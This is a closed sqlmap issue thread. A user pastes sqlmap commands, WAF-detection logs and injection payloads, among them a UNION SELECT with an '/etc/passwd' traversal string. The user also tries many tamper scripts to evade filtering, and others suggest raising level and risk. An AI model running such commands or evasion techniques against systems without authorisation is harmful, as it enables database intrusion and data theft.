Closed ashee69 closed 9 years ago
Have you tried running --identify-waf?
new tool itself asking me in the begining whether to indetify WAF so i dont think this command can do anything different. gonna run it again with it
I've noticed that at the beginngin of the run if it asks, it will almost never "find it", but if you tell to identify-waf, it will run the scripts and find out what one it is.
NO WAF
[00:05:31] [DEBUG] declared web page charset 'utf-8' [00:05:31] [DEBUG] heuristically checking if the target is protected by some kind of WAF/IPS/IDS [00:05:31] [PAYLOAD] VPyO=5304 AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2 NOT BETWEEN 0 AND 1-- ../../../etc/passwd [00:05:36] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection [00:05:36] [DEBUG] checking for WAF/IDS/IPS product 'FortiWeb Web Application Firewall (Fortinet Inc.)' [00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'SEnginx (Neusoft Corporation)' [00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'Deny All Web Application Firewall (DenyAll)' [00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'Varnish FireWall (OWASP) ' [00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'BIG-IP Application Security Manager (F5 Networks)' [00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'Anquanbao Web Application Firewall (Anquanbao)' [00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'Sucuri WebSite Firewall' [00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'KONA Security Solutions (Akamai Technologies)' [00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'Yunjiasu Web Application Firewall (Baidu)' [00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'Hyperguard Web Application Firewall (art of defence Inc.)' [00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'Palo Alto Firewall (Palo Alto Networks)' [00:05:45] [DEBUG] checking for WAF/IDS/IPS product 'SecureIIS Web Server Security (BeyondTrust)' [00:05:47] [DEBUG] declared web page charset 'iso-8859-1' [00:05:47] [DEBUG] got HTTP error code: 501 (Method Not Implemented) [00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'Cisco ACE XML Gateway (Cisco Systems)' [00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'BlockDoS' [00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)' [00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'CloudFlare Web Application Firewall (CloudFlare)' [00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'Incapsula Web Application Firewall (Incapsula/Imperva)' [00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'USP Secure Entry Server (United Security Providers)' [00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'EdgeCast WAF (Verizon)' [00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'ModSecurity: Open Source Web Application Firewall (Trustwave)' [00:05:47] [DEBUG] checking for WAF/IDS/IPS product '360 Web Application Firewall (360)' [00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)' [00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'ExpressionEngine (EllisLab)' [00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'KS-WAF (Knownsec)' [00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'Safedog Web Application Firewall (Safedog)' [00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'Profense Web Application Firewall (Armorlogic)' [00:05:47] [DEBUG] checking for WAF/IDS/IPS product 'webApp.secure (webScurity)' [00:05:49] [DEBUG] checking for WAF/IDS/IPS product 'WebKnight Application Firewall (AQTRONIX)' [00:05:49] [DEBUG] checking for WAF/IDS/IPS product 'ISA Server (Microsoft)' [00:05:49] [DEBUG] got HTTP error code: 400 (Bad Request) [00:05:49] [DEBUG] checking for WAF/IDS/IPS product 'NetScaler (Citrix Systems)' [00:05:49] [DEBUG] checking for WAF/IDS/IPS product 'Proventia Web Application Security (IBM)' [00:05:50] [DEBUG] page not found (404) [00:05:50] [DEBUG] checking for WAF/IDS/IPS product 'Airlock (Phion/Ergon)' [00:05:50] [DEBUG] checking for WAF/IDS/IPS product 'UrlScan (Microsoft)' [00:05:50] [DEBUG] checking for WAF/IDS/IPS product 'ASP.NET RequestValidationMode (Microsoft)' [00:05:50] [DEBUG] checking for WAF/IDS/IPS product 'Jiasule Web Application Firewall (Jiasule)' [00:05:50] [DEBUG] checking for WAF/IDS/IPS product 'IBM WebSphere DataPower (IBM)' [00:05:50] [DEBUG] checking for WAF/IDS/IPS product 'Barracuda Web Application Firewall (Barracuda Networks)' [00:05:50] [DEBUG] checking for WAF/IDS/IPS product 'TrafficShield (F5 Networks)' [00:05:50] [DEBUG] checking for WAF/IDS/IPS product 'BinarySEC Web Application Firewall (BinarySEC)' [00:05:50] [DEBUG] checking for WAF/IDS/IPS product 'dotDefender (Applicure Technologies)' [00:05:50] [DEBUG] checking for WAF/IDS/IPS product 'AppWall (Radware)' [00:05:50] [WARNING] no WAF/IDS/IPS product has been identified
so i continued the test and got this result my request: sqlmap --proxy=http://127.0.0.1:8080 --banner --safe-url=2 --safe-freq=3 --tamper=between -v 3 -u --dbs --threads=10 --level=2 --risk=2 --skip-urlencode --identify-waf
and result [01:05:23] [WARNING] HTTP error codes detected during run: 400 (Bad Request) - 1 times, 404 (Not Found) - 1 times, 501 (Not Implemented) - 1 times [01:05:23] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
How you concluded "NO WAF" from "[00:05:50] [WARNING] no WAF/IDS/IPS product has been identified" ????
Is identification the same as existences???
You have a false positive and now you want to force the target to be injectable. Please don't open any new issues like this one.
try use --batch --level=3 --risk=3 --random-agent
hello team, tell me if target is WAF protected first i got false injection this way sqlmap --proxy=http://127.0.0.1:8080 --banner --safe-url=2 --safe-freq=3 --tamper=between -v 2 --force-ssl --threads=10 {1.0-dev-ee11292} [17:40:12] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (SELECT)' [17:40:41] [INFO] GET parameter 'id' seems to be 'MySQL > 5.0.11 AND time-based blind (SELECT)' injectable it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y [17:47:53] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [17:47:53] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
and at last i got this [17:48:59] [INFO] checking if the injection point on GET parameter 'id' is a false positive [17:49:01] [WARNING] false positive or unexploitable injection point detected [17:49:01] [WARNING] GET parameter 'id' is not injectable
then i tried some more ways
sqlmap --proxy=http://127.0.0.1:8080 --banner --safe-url=2 --safe-freq=3 --tamper=between -v 3 --force-ssl --dbs --threads=10 --level=5 --risk=3 --technique=T --dbms=mysql [18:29:38] [WARNING] GET parameter 'id' is not injectable [18:29:38] [PAYLOAD] sqlmap/1.0-dev-ee11292 (http://sqlmap.org))').,')'(" [18:29:41] [WARNING] heuristic (basic) test shows that User-Agent parameter 'User-Agent' might not be injectable [18:32:46] [INFO] User-Agent parameter 'User-Agent' seems to be 'MySQL > 5.0.11 AND time-based blind (SELECT - comment)' injectable [18:33:11] [WARNING] false positive or unexploitable injection point detected [18:33:11] [WARNING] User-Agent parameter 'User-Agent' is not injectable
why parameter 'user-agent' ????
then i put there all generally used tamper scripts sqlmap --proxy=http://127.0.0.1:8080 --banner --safe-url=2 --safe-freq=3 -v 3 --force-ssl --dbs --threads=10 --level=2 --risk=2 --dbms=mysql --fresh-queries --parse-error --flush-session --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes so result is [18:45:56] [WARNING] false positive or unexploitable injection point detected [18:45:56] [WARNING] GET parameter 'id' is not injectable [18:45:56] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') [18:45:56] [WARNING] HTTP error codes detected during run: 414 (Request-URI Too Long) - 104 times [18:45:56] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
tried with random-agent sqlmap --proxy=http://127.0.0.1:8080 --banner --safe-url=2 --safe-freq=3 -v 3 --force-ssl --dbs --threads=10 --level=2 --risk=2 --dbms=mysql --fresh-queries --parse-error --random-agent --flush-session --tamper=between not injectable at all [20:31:21] [WARNING] GET parameter 'id' is not injectable
can you tell me some more ways to test or if it is not injectable. thank you.